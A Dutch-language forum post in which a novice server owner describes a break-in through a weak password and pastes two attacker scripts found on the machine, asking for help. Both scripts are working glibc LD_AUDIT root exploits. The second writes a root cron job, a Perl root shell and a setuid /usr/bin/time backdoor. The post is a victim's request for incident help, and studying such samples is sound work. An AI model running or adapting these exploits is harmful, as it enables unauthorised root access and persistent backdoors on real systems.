Hallo allemaal,
Als beginneling liep ik gisteren tegen het feit dat mijn dedicated server offline was gehaald wegens "verdachte activiteit"...
Nou daar sta je dan, waar te beginnen.
Een paar dagen ervoor werd ik getriggerd door het feit dat er een aantal, niet door mij geplaatste, bestanden op de server stonden in een net nieuw aangemaakt account.
Nu lijkt het erop dat men toegang heeft gekregen omdat ik, voor het online testen tijdens de bouw van een website, een te voor de hand liggend password heb aangemaakt...
Weer wat geleerd... ;-)
De bestanden die extra waren geplaatst zijn: psyBNC-2.3.2-7.tar.gz en expl2.tgz
Deze waren ook reeds uitgepakt en hebben deze mappen aangemaakt met e.e.a. aan bestanden erin: psybnc en .g
Toen de server weer online was, krijg ik maar 1 x de kans voor, heb ik als de donder overal een backup van gemaakt.
Daarna direct het misbruikte account verwijderd.
Nu is mijn vraag, wat kan er zoal gebeurd zijn, kan ik de installatie nog vertrouwen?
Ik zal van 2 bestanden de code plaatsen, wellicht kan iemand daaruit afleiden wat er gebeurd is en hoe dit wellicht ongedaan te maken...
bestand: ln.sh in de map .g
Het bestand max.sh in map .gCode:#!/bin/bash mkdir /tmp/ln ln /bin/ping /tmp/ln/target if [ ! -f /tmp/ln/target ];then echo "Not vulnerable." exit fi exec 3< /tmp/ln/target rm -rf /tmp/ln/ if [ ! -f /usr/bin/gcc ];then printf "Your version is - x86 - x64: " read VERS mv $VERS /tmp/ln chmod +x /tmp/ln LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 else gcc -w -fPIC -shared -o /tmp/ln x.c echo "In or out...." LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 fi
Ik hoop dat iemand me een beetje op weg kan helpen... ;-)Code:#!/bin/sh # Cel Mai Simplu Exploit De La Max Pentru Ce Prosti . # Salutari Lu Sanders , Iasul , Register . CRONTAB=`date +%s` BASETMP=`mktemp` LOADER=${BASETMP}.sh ROOTPL="${CRONTAB}.pl" rm -f ${BASETMP} touch ${LOADER} PERL=`which perl` if [ ! -f ${PERL} ]; then echo "[*] Adica Ai Nevoie De Perl[*]" exit fi umask 0 LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/${CRONTAB}" ping >/dev/null 2>&1 umask 22 if [ ! -f /etc/cron.d/${CRONTAB} ]; then echo "[*] Nu E Vulnerabil[*]" exit fi echo "* * * * * root /bin/bash ${LOADER}" > /etc/cron.d/${CRONTAB} echo "[*] Incerc Sa Iau Root /etc/cron.d/${CRONTAB}..." echo "rm -f /etc/cron.d/${CRONTAB}" > ${LOADER} echo "rm -f ${LOADER}" >> ${LOADER} echo "echo '#!${PERL}' > /etc/${ROOTPL}" >> ${LOADER} echo "echo '\$< = \$> = \$( = \$) = 0;' >> /etc/${ROOTPL}" >> ${LOADER} echo "echo 'undef %ENV; %ENV = (\"PATH\" => \"/bin:/usr/bin:/usr/sbin:/sbin\");' >> /etc/${ROOTPL}" >> $LOADER echo "echo 'system(\"/bin/bash -i\")' >> /etc/${ROOTPL}" >> ${LOADER} echo "chmod 755 /etc/${ROOTPL}" >> ${LOADER} echo "touch -r /usr/bin/time /etc/${ROOTPL}" >> ${LOADER} echo "chmod 4755 /usr/bin/time" >> ${LOADER} echo "touch -r /etc/${ROOTPL} /usr/bin/time" >> ${LOADER} chmod 755 ${LOADER} echo "[*] Nu Te Grabi Ca Nu E Usor..." while [ ! -f /etc/${ROOTPL} ]; do sleep 5; echo " >> "`date`; done echo "" echo "[*] Back Dor Instalat" #chmod -s /usr/bin/time" #rm -f /etc/${ROOTPL}" echo "" echo "" echo "[*] Esti Uid 0 Bravo Mie Ca Prostu De Tine Nu Stie" echo "" /usr/bin/time ${PERL} /etc/${ROOTPL} chmod -s /usr/bin/time" rm -f /etc/${ROOTPL}"
Alvast heel hartelijk bedankt!
Arne.

Likes:


Quote